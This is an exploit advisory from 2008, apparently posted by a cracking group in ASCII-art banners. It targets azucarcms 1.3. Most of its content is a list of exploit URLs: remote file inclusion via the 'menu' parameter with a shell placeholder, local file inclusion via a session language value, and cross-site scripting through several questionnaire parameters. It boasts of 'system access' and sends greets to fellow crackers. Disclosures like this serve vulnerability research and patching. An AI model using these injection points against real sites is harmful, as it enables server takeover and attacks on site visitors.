azucarcms version 1.3 suffers from remote file inclusion, local file inclusion, and cross site scripting vulnerabilities.
98593e3096cdcb3e9e1453b7a039c8f00902ba5c0bb35020edd710c362d36e72
┌┌───────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘ [ Remote File Include ] [ Local File Include ] [XSS] ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr : : :
│ Group : uNiTeD CraCkiNg ForCE │ │ │
│ Script : azucarcms 1.3 │ │ Register Globals : │
│ Download : SourceForge.net │ │ │
│ Method : GET │ │ [█] ON [ ] OFF │
│ Critical : High [░░▒▒▓▓██] │ │ │
│ Impact : System access │ │ │
│ ────────────────────────────────────┘ └─────────────────────────────────── │
│ DALnet #crackers ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘ Exploit URL's ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
[RFI]
http://localhost/path/src/contenido/vistas/articulos_opcionespos.php?menu=[SHELL]
http://localhost/path/src/contenido/vistas/articulos_publicar.php?menu=[SHELL]
http://localhost/path/src/contenido/vistas/indice_contenido.php?menu=[SHELL]
[LFI]
http://localhost/path/src/sistema/vistas/template/tpl_index.php?_SESSION[lang]=[LFI]
http://localhost/path/html/sitio/vistas/es_ES/index.php?_SESSION[lang]=[LFI]
[XSS]
http://localhost/path/src/cuestionarios/vistas/crear_pregunta.php?orden_preg=[XSS]
http://localhost/path/src/cuestionarios/vistas/crear_pregunta.php?nombre_cuestionario=[XSS]
http://localhost/path/src/cuestionarios/vistas/editar_pregunta.php?orden_preg=[XSS]
http://localhost/path/src/cuestionarios/vistas/editar_pregunta.php?nombre_cuestionario=[XSS]
http://localhost/path/src/cuestionarios/vistas/respuestas_individuales.php?usuario=[XSS]
└────────────────────────────────────────────────────────────────────────────┘
Greets:
The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS
┌┌───────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2008 ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘